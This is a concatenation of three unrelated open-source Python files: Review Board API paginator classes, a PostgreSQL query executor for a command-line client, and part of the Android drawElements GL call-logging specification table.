The resulting page data. This will usually be a :py:class:`list`,
but is implementation-dependent.
Raises:
InvalidPageError:
There was no next page to fetch.
"""
raise NotImplementedError
def iter_items(self, max_pages=None):
"""Iterate through all items across pages.
This will repeatedly fetch pages, iterating through all items and
providing them to the caller.
The maximum number of pages can be capped, to limit the impact on
the server.
Args:
max_pages (int, optional):
The maximum number of pages to iterate through.
Yields:
object:
Each item from each page's payload.
"""
for page in self.iter_pages(max_pages=max_pages):
for data in self.page_data:
yield data
def iter_pages(self, max_pages=None):
"""Iterate through pages of results.
This will repeatedly fetch pages, providing each parsed page payload
to the caller.
The maximum number of pages can be capped, to limit the impact on
the server.
Args:
max_pages (int, optional):
The maximum number of pages to iterate through.
Yields:
object:
The parsed payload for each page.
"""
try:
if max_pages is None:
while True:
yield self.page_data
self.next()
else:
for i in range(max_pages):
if i > 0:
self.next()
yield self.page_data
except InvalidPageError:
pass
def __iter__(self):
"""Iterate through pages of results.
This is a simple wrapper for :py:meth:`iter_pages`.
Yields:
object:
The parsed payload for each page.
"""
for page in self.iter_pages():
yield page
class APIPaginator(BasePaginator):
"""Handles pagination for API requests to a hosting service.
Hosting services may provide subclasses of ``APIPaginator`` that can handle
paginating their specific APIs. These make it easy to fetch pages of data
from the API, and also works as a bridge for Review Board's web API
resources.
All ``APIPaginators`` are expected to take an instance of a
:py:class:`~reviewboard.hostingsvcs.service.HostingServiceClient` subclass,
and the starting URL (without any arguments for pagination).
Subclasses can access the
:py:class:`~reviewboard.hostingsvcs.service.HostingServiceClient` through
the :py:attr:`client` member of the paginator in order to perform requests
against the hosting service.
Attributes:
client (reviewboard.hostingsvcs.service.HostingServiceClient):
The hosting service client used to make requests.
next_url (unicode):
The URL for the next set of results in the page.
page_headers (dict):
HTTP headers returned for the current page.
prev_url (unicode):
The URL for the previous set of results in the page.
url (unicode):
The URL used to fetch the current page of data.
"""
#: Query parameter name for the start page in a request.
#:
#: This is optional. Clients can specify this to provide this as part
#: of pagination queries.
start_query_param = None
#: Query parameter name for the requested number of results per page.
#:
#: This is optional. Clients can specify this to provide this as part
#: of pagination queries.
per_page_query_param = None
def __init__(self, client, url, query_params={}, *args, **kwargs):
"""Initialize the paginator.
Once initialized, the first page will be fetched automatically.
Args:
client (reviewboard.hostingsvcs.service.HostingServiceClient):
The hosting service client used to make requests.
url (unicode):
The URL used to make requests.
query_params (dict):
The query parameters to append to the URL for requests.
This will be updated with :py:attr:`start_query_param`
and :py:attr:`per_page_query_param`, if set.
*args (tuple):
Positional arguments for the parent constructor.
**kwargs (dict):
Keyword arguments for the parent constructor.
"""
super(APIPaginator, self).__init__(*args, **kwargs)
self.client = client
self.url = url
self.prev_url = None
self.next_url = None
self.page_headers = None
# Augment the URL with the provided query parameters.
query_params = query_params.copy()
if self.start_query_param and self.start:
query_params[self.start_query_param] = self.start
if self.per_page_query_param and self.per_page:
query_params[self.per_page_query_param] = self.per_page
self.request_kwargs.setdefault('query', {}).update(query_params)
self._fetch_page()
@property
def has_prev(self):
"""Whether there's a previous page available."""
return self.prev_url is not None
@property
def has_next(self):
"""Whether there's a next page available."""
return self.next_url is not None
def prev(self):
"""Fetch the previous page, returning the page data.
Returns:
object:
The resulting page data. This will usually be a :py:class:`list`,
but is implementation-dependent.
Raises:
InvalidPageError:
There was no previous page to fetch.
"""
if not self.has_prev:
raise InvalidPageError
self.url = self.prev_url
return self._fetch_page()
def next(self):
"""Fetch the next page, returning the page data.
Returns:
object:
The resulting page data. This will usually be a :py:class:`list`,
but is implementation-dependent.
Raises:
InvalidPageError:
There was no next page to fetch.
"""
if not self.has_next:
raise InvalidPageError
self.url = self.next_url
return self._fetch_page()
def fetch_url(self, url):
"""Fetch the URL, returning information on the page.
This must be implemented by subclasses. It must return a dictionary
with the following fields:
``data`` (:py:class:`object`)
The data from the page (generally as a list).
``headers`` (:py:class:`dict`)
The headers from the page response.
``total_count`` (:py:class:`int`, optional)
The optional total number of items across all pages.
``per_page`` (:py:class:`int`, optional)
The optional limit on the number of items fetched on each page.
``prev_url`` (:py:class:`unicode`, optional)
The optional URL to the previous page.
``next_url`` (:py:class:`unicode`, optional)
The optional URL to the next page.
Args:
url (unicode):
The URL to fetch.
Returns:
dict:
The pagination information with the above fields.
"""
raise NotImplementedError
def _fetch_page(self):
"""Fetch a page and extracts the information from it.
Returns:
object:
The resulting page data. This will usually be a :py:class:`list`,
but is implementation-dependent.
"""
page_info = self.fetch_url(self.url)
self.prev_url = page_info.get('prev_url')
self.next_url = page_info.get('next_url')
self.per_page = page_info.get('per_page', self.per_page)
self.page_data = page_info.get('data')
self.page_headers = page_info.get('headers', {})
self.total_count = page_info.get('total_count')
# Make sure the implementation sent the correct data to us.
assert self.prev_url is None or isinstance(self.prev_url, str), \
('"prev_url" result from fetch_url() must be None or Unicode '
'string, not %r'
% type(self.prev_url))
assert self.next_url is None or isinstance(self.next_url, str), \
('"next_url" result from fetch_url() must be None or Unicode '
'string, not %r'
% type(self.next_url))
assert self.total_count is None or isinstance(self.total_count, int), \
('"total_count" result from fetch_url() must be None or int, not '
'%r'
% type(self.total_count))
assert self.per_page is None or isinstance(self.per_page, int), \
('"per_page" result from fetch_url() must be an int, not %r'
% type(self.per_page))
assert isinstance(self.page_headers, dict), \
('"page_headers" result from fetch_url() must be a dictionary, '
'not %r'
% type(self.page_headers))
return self.page_data
class ProxyPaginator(BasePaginator):
"""A paginator that proxies to another paginator, transforming data.
This attaches to another paginator, forwarding all requests and proxying
all data.
``ProxyPaginator`` can take the data returned from the other paginator and
normalize it, transforming it into a new form.
This is useful when a
:py:class:`~reviewboard.hostingsvcs.service.HostingService` wants to return
a paginator to callers that represents data in a structured way, using an
:py:class:`APIPaginator`'s raw payloads as a backing.
Attributes:
paginator (BasePaginator):
The paginator that this is a proxy for.
normalize_page_data_func (callable):
A function used to normalize a page of results from the paginator.
"""
def __init__(self, paginator, normalize_page_data_func=None):
"""Initialize the paginator.
Args:
paginator (BasePaginator):
The paginator that this is a proxy for.
normalize_page_data_func (callable, optional):
A function used to normalize a page of results from the
paginator.
"""
# NOTE: We're not calling BasePaginator here, because we're actually
# overriding all the properties it would set that we care about.
self.paginator = paginator
self.normalize_page_data_func = normalize_page_data_func
self.page_data = self.normalize_page_data(self.paginator.page_data)
@property
def has_prev(self):
"""Whether there's a previous page available."""
return self.paginator.has_prev
@property
def has_next(self):
"""Whether there's a next page available."""
return self.paginator.has_next
@property
def per_page(self):
"""The number of items requested per page."""
return self.paginator.per_page
@property
def total_count(self):
"""The number of items across all pages, if known."""
return self.paginator.total_count
def prev(self):
"""Fetch the previous page, returning the page data.
Returns:
object:
The resulting page data. This will usually be a :py:class:`list`,
but is implementation-dependent.
Raises:
InvalidPageError:
There was no previous page to fetch.
"""
return self._process_page(self.paginator.prev())
def next(self):
"""Fetch the next page, returning the page data.
Returns:
object:
The resulting page data. This will usually be a :py:class:`list`,
but is implementation-dependent.
Raises:
InvalidPageError:
There was no next page to fetch.
"""
return self._process_page(self.paginator.next())
def normalize_page_data(self, data):
"""Normalize a page of data.
If :py:attr:`normalize_page_data_func` was passed on construction, this
will call it, passing in the page data. That will then be returned.
This can be overridden by subclasses that want to do more complex
processing without requiring ``normalize_page_data_func`` to be
passed in.
Args:
data (object):
The data to normalize.
Returns:
object:
The resulting data.
"""
if callable(self.normalize_page_data_func):
data = self.normalize_page_data_func(data)
return data
def _process_page(self, page_data):
"""Process a page of data.
This will normalize the page data, store it, and return it.
Args:
page_data (object):
The data to process.
Returns:
object:
The resulting data.
"""
self.page_data = self.normalize_page_data(page_data)
return self.page_data
| |
import traceback
import logging
import psycopg2
import psycopg2.extras
import psycopg2.extensions as ext
import sqlparse
import pgspecial as special
from .packages.function_metadata import FunctionMetadata
from .encodingutils import unicode2utf8, PY2, utf8tounicode
import click
_logger = logging.getLogger(__name__)
# Cast all database input to unicode automatically.
# See http://initd.org/psycopg/docs/usage.html#unicode-handling for more info.
ext.register_type(ext.UNICODE)
ext.register_type(ext.UNICODEARRAY)
ext.register_type(ext.new_type((705,), "UNKNOWN", ext.UNICODE))
# Cast bytea fields to text. By default, this will render as hex strings with
# Postgres 9+ and as escaped binary in earlier versions.
ext.register_type(ext.new_type((17,), 'BYTEA_TEXT', psycopg2.STRING))
# When running a query, make pressing CTRL+C raise a KeyboardInterrupt
# See http://initd.org/psycopg/articles/2014/07/20/cancelling-postgresql-statements-python/
ext.set_wait_callback(psycopg2.extras.wait_select)
ON_ERROR_RAISE = 0
ON_ERROR_RESUME = 1
ON_ERROR_STOP = 2
def register_json_typecasters(conn, loads_fn):
"""Set the function for converting JSON data for a connection.
Use the supplied function to decode JSON data returned from the database
via the given connection. The function should accept a single argument of
the data as a string encoded in the database's character encoding.
psycopg2's default handler for JSON data is json.loads.
http://initd.org/psycopg/docs/extras.html#json-adaptation
This function attempts to register the typecaster for both JSON and JSONB
types.
Returns a set that is a subset of {'json', 'jsonb'} indicating which types
(if any) were successfully registered.
"""
available = set()
for name in ['json', 'jsonb']:
try:
psycopg2.extras.register_json(conn, loads=loads_fn, name=name)
available.add(name)
except psycopg2.ProgrammingError:
pass
return available
def register_hstore_typecaster(conn):
"""
Instead of using register_hstore() which converts hstore into a python
dict, we query the 'oid' of hstore which will be different for each
database and register a type caster that converts it to unicode.
http://initd.org/psycopg/docs/extras.html#psycopg2.extras.register_hstore
"""
with conn.cursor() as cur:
try:
cur.execute("SELECT 'hstore'::regtype::oid")
oid = cur.fetchone()[0]
ext.register_type(ext.new_type((oid,), "HSTORE", ext.UNICODE))
except Exception:
pass
class PGExecute(object):
# The boolean argument to the current_schemas function indicates whether
# implicit schemas, e.g. pg_catalog
search_path_query = '''
SELECT * FROM unnest(current_schemas(true))'''
schemata_query = '''
SELECT nspname
FROM pg_catalog.pg_namespace
ORDER BY 1 '''
tables_query = '''
SELECT n.nspname schema_name,
c.relname table_name
FROM pg_catalog.pg_class c
LEFT JOIN pg_catalog.pg_namespace n
ON n.oid = c.relnamespace
WHERE c.relkind = ANY(%s)
ORDER BY 1,2;'''
columns_query = '''
SELECT nsp.nspname schema_name,
cls.relname table_name,
att.attname column_name
FROM pg_catalog.pg_attribute att
INNER JOIN pg_catalog.pg_class cls
ON att.attrelid = cls.oid
INNER JOIN pg_catalog.pg_namespace nsp
ON cls.relnamespace = nsp.oid
WHERE cls.relkind = ANY(%s)
AND NOT att.attisdropped
AND att.attnum > 0
ORDER BY 1, 2, 3'''
functions_query = '''
SELECT n.nspname schema_name,
p.proname func_name,
pg_catalog.pg_get_function_arguments(p.oid) arg_list,
pg_catalog.pg_get_function_result(p.oid) return_type,
p.proisagg is_aggregate,
p.proiswindow is_window,
p.proretset is_set_returning
FROM pg_catalog.pg_proc p
INNER JOIN pg_catalog.pg_namespace n
ON n.oid = p.pronamespace
ORDER BY 1, 2'''
databases_query = """SELECT d.datname as "Name",
pg_catalog.pg_get_userbyid(d.datdba) as "Owner",
pg_catalog.pg_encoding_to_char(d.encoding) as "Encoding",
d.datcollate as "Collate",
d.datctype as "Ctype",
pg_catalog.array_to_string(d.datacl, E'\n') AS "Access privileges"
FROM pg_catalog.pg_database d
ORDER BY 1;"""
datatypes_query = '''
SELECT n.nspname schema_name,
t.typname type_name
FROM pg_catalog.pg_type t
INNER JOIN pg_catalog.pg_namespace n
ON n.oid = t.typnamespace
WHERE ( t.typrelid = 0 -- non-composite types
OR ( -- composite type, but not a table
SELECT c.relkind = 'c'
FROM pg_catalog.pg_class c
WHERE c.oid = t.typrelid
)
)
AND NOT EXISTS( -- ignore array types
SELECT 1
FROM pg_catalog.pg_type el
WHERE el.oid = t.typelem AND el.typarray = t.oid
)
AND n.nspname <> 'pg_catalog'
AND n.nspname <> 'information_schema'
ORDER BY 1, 2;'''
def __init__(self, database, user, password, host, port, dsn):
self.dbname = database
self.user = user
self.password = password
self.host = host
self.port = port
self.dsn = dsn
self.connect()
def connect(self, database=None, user=None, password=None, host=None,
port=None, dsn=None):
db = (database or self.dbname)
user = (user or self.user)
password = (password or self.password)
host = (host or self.host)
port = (port or self.port)
dsn = (dsn or self.dsn)
if dsn:
if password:
dsn = "{0} password={1}".format(dsn, password)
conn = psycopg2.connect(dsn=unicode2utf8(dsn))
cursor = conn.cursor()
# When we connect using a DSN, we don't really know what db,
# user, etc. we connected to. Let's read it.
db = self._select_one(cursor, 'select current_database()')
user = self._select_one(cursor, 'select current_user')
host = self._select_one(cursor, 'select inet_server_addr()')
port = self._select_one(cursor, 'select inet_server_port()')
else:
conn = psycopg2.connect(
database=unicode2utf8(db),
user=unicode2utf8(user),
password=unicode2utf8(password),
host=unicode2utf8(host),
port=unicode2utf8(port))
conn.set_client_encoding('utf8')
if hasattr(self, 'conn'):
self.conn.close()
self.conn = conn
self.conn.autocommit = True
self.dbname = db
self.user = user
self.password = password
self.host = host
self.port = port
register_json_typecasters(self.conn, self._json_typecaster)
register_hstore_typecaster(self.conn)
def _select_one(self, cur, sql):
"""
Helper method to run a select and retrieve a single field value
:param cur: cursor
:param sql: string
:return: string
"""
cur.execute(sql)
return cur.fetchone()
def _json_typecaster(self, json_data):
"""Interpret incoming JSON data as a string.
The raw data is decoded using the connection's encoding, which defaults
to the database's encoding.
See http://initd.org/psycopg/docs/connection.html#connection.encoding
"""
if PY2:
return json_data.decode(self.conn.encoding)
else:
return json_data
def run(self, statement, pgspecial=None, on_error=ON_ERROR_RESUME):
"""Execute the sql in the database and return the results.
:param statement: A string containing one or more sql statements
:param pgspecial: PGSpecial object
:return: List of tuples containing (title, rows, headers, status)
"""
# Remove spaces and EOL
statement = statement.strip()
if not statement: # Empty string
yield (None, None, None, None)
# Split the sql into separate queries and run each one.
for sql in sqlparse.split(statement):
# Remove spaces, eol and semi-colons.
sql = sql.rstrip(';')
try:
if pgspecial:
# First try to run each query as special
_logger.debug('Trying a pgspecial command. sql: %r', sql)
cur = self.conn.cursor()
try:
for result in pgspecial.execute(cur, sql):
yield result
continue
except special.CommandNotFound:
pass
# Not a special command, so execute as normal sql
yield self.execute_normal_sql(sql)
except psycopg2.DatabaseError as e:
_logger.error("sql: %r, error: %r", sql, e)
_logger.error("traceback: %r", traceback.format_exc())
if (isinstance(e, psycopg2.OperationalError)
or on_error == ON_ERROR_RAISE):
# Always raise operational errors, regardless of on_error
# specification
raise
result = click.style(utf8tounicode(str(e)), fg='red')
yield None, None, None, result
if on_error == ON_ERROR_STOP:
break
def execute_normal_sql(self, split_sql):
_logger.debug('Regular sql statement. sql: %r', split_sql)
cur = self.conn.cursor()
cur.execute(split_sql)
try:
title = self.conn.notices.pop()
except IndexError:
title = None
# cur.description will be None for operations that do not return
# rows.
if cur.description:
headers = [x[0] for x in cur.description]
return title, cur, headers, cur.statusmessage
else:
_logger.debug('No rows in result.')
return title, None, None, cur.statusmessage
def search_path(self):
"""Returns the current search path as a list of schema names"""
with self.conn.cursor() as cur:
_logger.debug('Search path query. sql: %r', self.search_path_query)
cur.execute(self.search_path_query)
return [x[0] for x in cur.fetchall()]
def schemata(self):
"""Returns a list of schema names in the database"""
with self.conn.cursor() as cur:
_logger.debug('Schemata Query. sql: %r', self.schemata_query)
cur.execute(self.schemata_query)
return [x[0] for x in cur.fetchall()]
def _relations(self, kinds=('r', 'v', 'm')):
"""Get table or view name metadata
:param kinds: list of postgres relkind filters:
'r' - table
'v' - view
'm' - materialized view
:return: (schema_name, rel_name) tuples
"""
with self.conn.cursor() as cur:
sql = cur.mogrify(self.tables_query, [kinds])
_logger.debug('Tables Query. sql: %r', sql)
cur.execute(sql)
for row in cur:
yield row
def tables(self):
"""Yields (schema_name, table_name) tuples"""
for row in self._relations(kinds=['r']):
yield row
def views(self):
"""Yields (schema_name, view_name) tuples.
Includes both views and and materialized views
"""
for row in self._relations(kinds=['v', 'm']):
yield row
def _columns(self, kinds=('r', 'v', 'm')):
"""Get column metadata for tables and views
:param kinds: kinds: list of postgres relkind filters:
'r' - table
'v' - view
'm' - materialized view
:return: list of (schema_name, relation_name, column_name) tuples
"""
with self.conn.cursor() as cur:
sql = cur.mogrify(self.columns_query, [kinds])
_logger.debug('Columns Query. sql: %r', sql)
cur.execute(sql)
for row in cur:
yield row
def table_columns(self):
for row in self._columns(kinds=['r']):
yield row
def view_columns(self):
for row in self._columns(kinds=['v', 'm']):
yield row
def databases(self):
with self.conn.cursor() as cur:
_logger.debug('Databases Query. sql: %r', self.databases_query)
cur.execute(self.databases_query)
return [x[0] for x in cur.fetchall()]
def functions(self):
"""Yields FunctionMetadata named tuples"""
with self.conn.cursor() as cur:
_logger.debug('Functions Query. sql: %r', self.functions_query)
cur.execute(self.functions_query)
for row in cur:
yield FunctionMetadata(*row)
def datatypes(self):
"""Yields tuples of (schema_name, type_name)"""
with self.conn.cursor() as cur:
_logger.debug('Datatypes Query. sql: %r', self.datatypes_query)
cur.execute(self.datatypes_query)
for row in cur:
yield row
| |
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------
# drawElements Quality Program utilities
# --------------------------------------
#
# Copyright 2015 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#-------------------------------------------------------------------------
from src_util import *
import re
class LogSpec:
def __init__ (self, argInPrints, argOutPrints = {}, returnPrint = None):
self.argInPrints = argInPrints
self.argOutPrints = argOutPrints
self.returnPrint = returnPrint
def enum (group):
return lambda name: "get%sStr(%s)" % (group, name)
def pointer (size):
return lambda name: "getPointerStr(%s, %s)" % (name, size)
def enumPointer (group, size):
return lambda name: "getEnumPointerStr(%(name)s, %(size)s, %(nameFunc)s)" % {"name": name, "size": size, "nameFunc": ("get%sName" % group)}
def booleanPointer (size):
return lambda name: "getBooleanPointerStr(%s, %s)" % (name, size)
def textureUnit (name):
return "getTextureUnitStr(%s)" % name
def voidPointer (name):
return "toHex(reinterpret_cast<deUintptr>(static_cast<const void*>(%s)))" % name
def fnPointer (name):
return "toHex(reinterpret_cast<deUintptr>(%s))" % name
stringVal = lambda name: "getStringStr(%s)" % name
# Special rules for printing call arguments
CALL_LOG_SPECS = {
"glActiveTexture": LogSpec({0: textureUnit}),
"glBeginQuery": LogSpec({0: enum("QueryTarget")}),
"glBeginTransformFeedback": LogSpec({0: enum("PrimitiveType")}),
"glBindBuffer": LogSpec({0: enum("BufferTarget")}),
"glBindBufferBase": LogSpec({0: enum("BufferTarget")}),
"glBindBufferRange": LogSpec({0: enum("BufferTarget")}),
"glBindFramebuffer": LogSpec({0: enum("FramebufferTarget")}),
"glBindRenderbuffer": LogSpec({0: enum("FramebufferTarget")}),
"glBindTexture": LogSpec({0: enum("TextureTarget")}),
"glBindTransformFeedback": LogSpec({0: enum("TransformFeedbackTarget")}),
"glBlendEquation": LogSpec({0: enum("BlendEquation")}),
"glBlendEquationSeparate": LogSpec({0: enum("BlendEquation"), 1: enum("BlendEquation")}),
"glBlendEquationi": LogSpec({1: enum("BlendEquation")}),
"glBlendEquationSeparatei": LogSpec({1: enum("BlendEquation"), 2: enum("BlendEquation")}),
"glBlendFunc": LogSpec({0: enum("BlendFactor"), 1: enum("BlendFactor")}),
"glBlendFuncSeparate": LogSpec({0: enum("BlendFactor"), 1: enum("BlendFactor"), 2: enum("BlendFactor"), 3: enum("BlendFactor")}),
"glBlitFramebuffer": LogSpec({8: enum("BufferMask"), 9: enum("TextureFilter")}),
"glBufferData": LogSpec({0: enum("BufferTarget"), 3: enum("Usage")}),
"glBufferSubData": LogSpec({0: enum("BufferTarget")}),
"glCheckFramebufferStatus": LogSpec({0: enum("FramebufferTarget")}, returnPrint = enum("FramebufferStatus")),
"glClear": LogSpec({0: enum("BufferMask")}),
"glClearBufferfv": LogSpec({0: enum("Buffer")}),
"glClearBufferfi": LogSpec({0: enum("Buffer")}),
"glClearBufferiv": LogSpec({0: enum("Buffer")}),
"glClearBufferuiv": LogSpec({0: enum("Buffer")}),
"glCompressedTexImage2D": LogSpec({0: enum("TextureTarget"), 2: enum("CompressedTextureFormat")}),
"glCompressedTexSubImage2D": LogSpec({0: enum("TextureTarget"), 6: enum("CompressedTextureFormat")}),
"glCompressedTexImage3D": LogSpec({0: enum("TextureTarget"), 2: enum("CompressedTextureFormat")}),
"glCompressedTexSubImage3D": LogSpec({0: enum("TextureTarget"), 8: enum("CompressedTextureFormat")}),
"glCopyTexImage1D": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat")}),
"glCopyTexImage2D": LogSpec({0: enum("TextureTarget"), 2: enum("UncompressedTextureFormat")}),
"glCreateShader": LogSpec({0: enum("ShaderType")}),
"glCullFace": LogSpec({0: enum("Face")}),
"glDeleteBuffers": LogSpec({1: pointer(size = "n")}),
"glDeleteFramebuffers": LogSpec({1: pointer(size = "n")}),
"glDeleteQueries": LogSpec({1: pointer(size = "n")}),
"glDeleteRenderbuffers": LogSpec({1: pointer(size = "n")}),
"glDeleteBuffers": LogSpec({1: pointer(size = "n")}),
"glDeleteTextures": LogSpec({1: pointer(size = "n")}),
"glDeleteVertexArrays": LogSpec({1: pointer(size = "n")}),
"glDeleteProgramPipelines": LogSpec({1: pointer(size = "n")}),
"glDepthFunc": LogSpec({0: enum("CompareFunc")}),
"glDisable": LogSpec({0: enum("EnableCap")}),
"glDisablei": LogSpec({0: enum("IndexedEnableCap")}),
"glDrawArrays": LogSpec({0: enum("PrimitiveType")}),
"glDrawArraysInstanced": LogSpec({0: enum("PrimitiveType")}),
"glDrawBuffers": LogSpec({1: enumPointer("DrawReadBuffer", size = "n")}),
"glDrawElements": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glDrawElementsInstanced": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glDrawRangeElements": LogSpec({0: enum("PrimitiveType"), 4: enum("Type")}),
"glDrawArraysIndirect": LogSpec({0: enum("PrimitiveType")}),
"glDrawElementsIndirect": LogSpec({0: enum("PrimitiveType"), 1: enum("Type")}),
"glDrawElementsBaseVertex": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glDrawElementsInstancedBaseVertex": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glDrawRangeElementsBaseVertex": LogSpec({0: enum("PrimitiveType"), 4: enum("Type")}),
"glMultiDrawArrays": LogSpec({0: enum("PrimitiveType")}),
"glMultiDrawElements": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glMultiDrawElementsBaseVertex": LogSpec({0: enum("PrimitiveType"), 2: enum("Type")}),
"glEnable": LogSpec({0: enum("EnableCap")}),
"glEnablei": LogSpec({0: enum("IndexedEnableCap")}),
"glEndQuery": LogSpec({0: enum("QueryTarget")}),
"glFramebufferRenderbuffer": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferAttachment"), 2: enum("FramebufferTarget")}),
"glFramebufferTexture2D": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferAttachment"), 2: enum("TextureTarget")}),
"glFramebufferTextureLayer": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferAttachment")}),
"glFramebufferTexture": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferAttachment")}),
"glFramebufferParameteri": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferParameter")}),
"glFrontFace": LogSpec({0: enum("Winding")}),
"glGenBuffers": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenerateMipmap": LogSpec({0: enum("TextureTarget")}),
"glGenFramebuffers": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenQueries": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenRenderbuffers": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenTextures": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenTransformFeedbacks": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenVertexArrays": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
"glGenProgramPipelines": LogSpec({}, argOutPrints = {1: pointer(size = "n")}),
# "glGetActiveAttrib":
"glGetActiveUniform": LogSpec({}, argOutPrints = {3: pointer(size = "1"), 4: pointer(size = "1"), 5: enumPointer("ShaderVarType", size = "1"), 6: stringVal}),
"glGetActiveUniformsiv": LogSpec({2: pointer(size = "uniformCount"), 3: enum("UniformParam")}, argOutPrints = {4: pointer(size = "uniformCount")}),
# "glGetAttachedShaders":
"glGetBooleanv":
LogSpec(
{
0: enum("GettableState"),
1: voidPointer # second argument has type of GLboolean* (aka. char*). Prevent
# wrapper from attempting to print the argument as a C string.
},
argOutPrints = {1: booleanPointer(size = "getBasicQueryNumArgsOut(pname)")}),
"glGetBufferParameteriv": LogSpec({0: enum("BufferTarget"), 1: enum("BufferQuery")}),
"glGetBufferParameteri64v": LogSpec({0: enum("BufferTarget"), 1: enum("BufferQuery")}),
"glGetError": LogSpec({}, returnPrint = enum("Error")),
"glGetFloatv": LogSpec({0: enum("GettableState")}, argOutPrints = {1: pointer(size = "getBasicQueryNumArgsOut(pname)")}),
"glGetFramebufferAttachmentParameteriv":
LogSpec(
{
0: enum("FramebufferTarget"),
1: enum("FramebufferAttachment"),
2: enum("FramebufferAttachmentParameter")
},
argOutPrints = {3: lambda name: "getFramebufferAttachmentParameterValueStr(pname, %s)" % name}),
"glGetFramebufferParameteriv": LogSpec({0: enum("FramebufferTarget"), 1: enum("FramebufferParameter")}, argOutPrints = {2: pointer(size = "1")}),
"glGetIntegerv": LogSpec({0: enum("GettableState")}, argOutPrints = {1: pointer(size = "getBasicQueryNumArgsOut(pname)")}),
"glGetInteger64v": LogSpec({0: enum("GettableState")}, argOutPrints = {1: pointer(size = "getBasicQueryNumArgsOut(pname)")}),
"glGetIntegeri_v": LogSpec({0: enum("GettableIndexedState")}, argOutPrints = {2:pointer(size = "getIndexedQueryNumArgsOut(target)")}),
"glGetInteger64i_v": LogSpec({0: enum("GettableIndexedState")}, argOutPrints = {2: pointer(size = "getIndexedQueryNumArgsOut(target)")}),
"glGetBooleani_v":
LogSpec(
{
0: enum("GettableIndexedState"),
2: voidPointer # last argument has type of GLboolean* (aka. char*). Prevent
# wrapper from attempting to print the argument as a C string.
},
argOutPrints = {2: booleanPointer(size = "getIndexedQueryNumArgsOut(target)")}),
"glGetInternalformativ": LogSpec({0: enum("InternalFormatTarget"), 1: enum("UncompressedTextureFormat"), 2: enum("InternalFormatParameter")}, argOutPrints = {4: pointer(size = "bufSize")}),
"glGetMultisamplefv": LogSpec({0: enum("MultisampleParameter")}, argOutPrints = {2: pointer(size = "2")}),
"glGetPointerv": LogSpec({0: enum("PointerState")}, argOutPrints = {1: pointer(size = "1")}),
"glGetProgramiv": LogSpec({1: enum("ProgramParam")}, argOutPrints = {2: pointer(size = "getProgramQueryNumArgsOut(pname)")}),
"glGetProgramInfoLog": LogSpec({3: voidPointer}, argOutPrints = {2: pointer(size = "1")}),
"glGetProgramPipelineiv": LogSpec({1: enum("PipelineParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetProgramPipelineInfoLog": LogSpec({3: voidPointer}, argOutPrints = {2: pointer(size = "1")}),
"glGetQueryiv": LogSpec({0: enum("QueryTarget"), 1: enum("QueryParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetQueryObjectiv": LogSpec({1: enum("QueryObjectParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetQueryObjectuiv": LogSpec({1: enum("QueryObjectParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetQueryObjecti64v": LogSpec({1: enum("QueryObjectParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetQueryObjectui64v": LogSpec({1: enum("QueryObjectParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetRenderbufferParameteriv": LogSpec({0: enum("FramebufferTarget"), 1: enum("RenderbufferParameter")}),
"glGetSamplerParameterfv": LogSpec({1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetSamplerParameteriv": LogSpec({1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetSamplerParameterIiv": LogSpec({1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetSamplerParameterIuiv": LogSpec({1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetShaderiv": LogSpec({1: enum("ShaderParam")}, argOutPrints = {2: pointer(size = "1")}),
"glGetShaderInfoLog": LogSpec({3: voidPointer}, argOutPrints = {2: pointer(size = "1")}),
"glGetShaderPrecisionFormat": LogSpec({0: enum("ShaderType"), 1: enum("PrecisionFormatType")}),
# "glGetShaderSource":
"glGetString": LogSpec({0: enum("GettableString")}, returnPrint=stringVal),
"glGetStringi": LogSpec({0: enum("GettableString")}, returnPrint=stringVal),
"glGetTexParameterfv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetTexParameteriv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
"glGetTexParameterIiv": LogSpec({0: enum("TextureTarget"), 1: enum("TextureParameter")}, argOutPrints = {2: pointer(size = "getTextureParamQueryNumArgsOut(pname)")}),
